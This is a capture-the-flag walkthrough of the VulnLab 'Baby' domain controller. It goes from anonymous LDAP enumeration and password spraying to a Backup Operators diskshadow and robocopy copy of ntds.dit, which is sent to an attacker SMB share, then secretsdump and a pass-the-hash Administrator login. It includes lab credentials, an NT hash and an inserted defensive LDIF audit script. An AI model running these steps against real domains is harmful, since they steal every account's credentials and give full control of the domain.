Where Notes Work
BABY – VULNLAB
This is the Write-up/Walkthrough of the BABY Machine from VULNLAB.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 06:36:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T06:36:52+00:00
|_ssl-date: 2023-08-12T06:37:31+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
Domain: baby.vl, NetBIOS name: BabyDC
Starting with SMB, I tried connecting anonymously, but that was not allowed. Moving on, I used ldapsearch to enumerate the domain with a blank (anonymous) bind.
ldapsearch -H ldap://10.10.92.79 -D '' -w '' -b "DC=baby,DC=vl"
Looking through the output, I found a password for the user teresa.bell in the Description attribute.
After that I extracted all the usernames by grepping for "dn", removed the entries that are not user accounts, and converted each name to the first.last format: if the name is "John Doe", replace the space with a dot to get john.doe.
cat ldap_search | grep dn | grep -o 'CN=[^,]*'
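Added example, not part of the original writeup: a small Python audit a defender can run over an ldapsearch LDIF export to catch the misconfiguration used above, a password left in a user's Description attribute. It parses the LDIF (folded lines, base64 '::' values) and flags descriptions that mention credentials or contain a complex password-looking token. SAMPLE_LDIF is constructed sample data with made-up names, not output from the lab.

```python
import base64
import re

# Constructed sample in ldapsearch LDIF style (not lab output); '::' marks a base64 value.
SAMPLE_LDIF = """\
dn: CN=Jane Doe,OU=it,DC=example,DC=local
sAMAccountName: jane.doe
description: Set initial password to Welcome2024! then change it

dn: CN=John Smith,OU=dev,DC=example,DC=local
sAMAccountName: john.smith
description: Developer, EMEA team

dn: CN=svc backup,OU=services,DC=example,DC=local
sAMAccountName: svc_backup
description:: """ + base64.b64encode(b"password: B4ckup_Svc_2024!").decode() + "\n"

# Words that usually accompany a credential written into a free-text field.
KEYWORD_RE = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.I)
# A token of 8+ non-space chars mixing upper, lower, digit and punctuation.
COMPLEX_TOKEN_RE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")


def parse_ldif(text):
    """Parse LDIF into [{attribute: [values]}]: unfold continuation lines,
    decode base64 ('::') values, skip comment lines and blocks without a dn."""
    text = re.sub(r"\n ", "", text)          # LDIF folds long lines with a leading space
    entries = []
    for block in re.split(r"\n\s*\n", text):  # entries are separated by blank lines
        entry = {}
        for m in re.finditer(r"^([\w;.-]+)(::?) ?(.*)$", block, re.M):
            attr, sep, value = m.groups()
            if sep == "::":
                value = base64.b64decode(value).decode("utf-8", "replace")
            entry.setdefault(attr, []).append(value)
        if "dn" in entry:                     # drops the search:/result: trailer
            entries.append(entry)
    return entries


def find_exposed_descriptions(entries):
    """Return (dn, description, reason) for entries whose description looks like a credential."""
    hits = []
    for entry in entries:
        for desc in entry.get("description", []):
            reasons = [label for regex, label in ((KEYWORD_RE, "credential keyword"),
                       (COMPLEX_TOKEN_RE, "password-like token")) if regex.search(desc)]
            if reasons:
                hits.append((entry["dn"][0], desc, ", ".join(reasons)))
    return hits
```

Run it over the saved ldapsearch output (parse_ldif(open("ldap_search").read())) to list every account whose description should be cleaned up.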
Next I used crackmapexec to spray the found password across the username list.
crackmapexec smb 10.10.92.79 -u usernames.txt -p 'BabyStart123!'
None of the users accepted the found credential, but the output showed that the password of caroline.robinson must be changed before SMB will accept it, so I used smbpasswd to change it.
smbpasswd -r 10.10.92.79 -U caroline.robinson
Enter the found password as the old SMB password and set a new password for caroline.robinson.
After that I used evil-winrm to log in as caroline.robinson and got the user flag.
evil-winrm -u caroline.robinson -p 'hacker@123' -i 10.10.92.79
caroline.robinson turned out to be a member of the Backup Operators group, which means the user can back up and restore files on the system (SeBackupPrivilege and SeRestorePrivilege).
net user caroline.robinson /domain
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Create a diskshadow script file (kunal.dsh) containing the commands diskshadow will run:
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
unix2dos kunal.dsh
After converting it with unix2dos, upload the file with evil-winrm's upload function and run diskshadow against it to expose a shadow copy of the C: drive as a new Z: drive:
diskshadow /s kunal.dsh
diskshadow exposed the shadow copy of the C: drive as Z:. Using the backup privilege (robocopy /B), I copied ntds.dit out of the shadow copy:
robocopy /B Z:\Windows\NTDS . ntds.dit
After that I tried to download ntds.dit with evil-winrm's download function, but it kept failing, so I started an SMB server with impacket-smbserver and copied ntds.dit over to my Linux machine.
Start the SMB server on Linux (share name "share", serving the current directory):
impacket-smbserver -smb2support share .
Copy the ntds.dit file to the share:
copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit
secretsdump needs the SYSTEM hive as well as ntds.dit to decrypt the hashes, so I saved it from the registry:
reg save hklm\system system.hive
I downloaded system.hive to my Linux machine as well and ran impacket's secretsdump to dump the hashes:
impacket-secretsdump -ntds ntds.dit -system system.hive local
With the Administrator NT hash, I used evil-winrm to log in as Administrator using pass-the-hash:
evil-winrm -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -i 10.10.88.6
If you face any problems, let me know in the comments.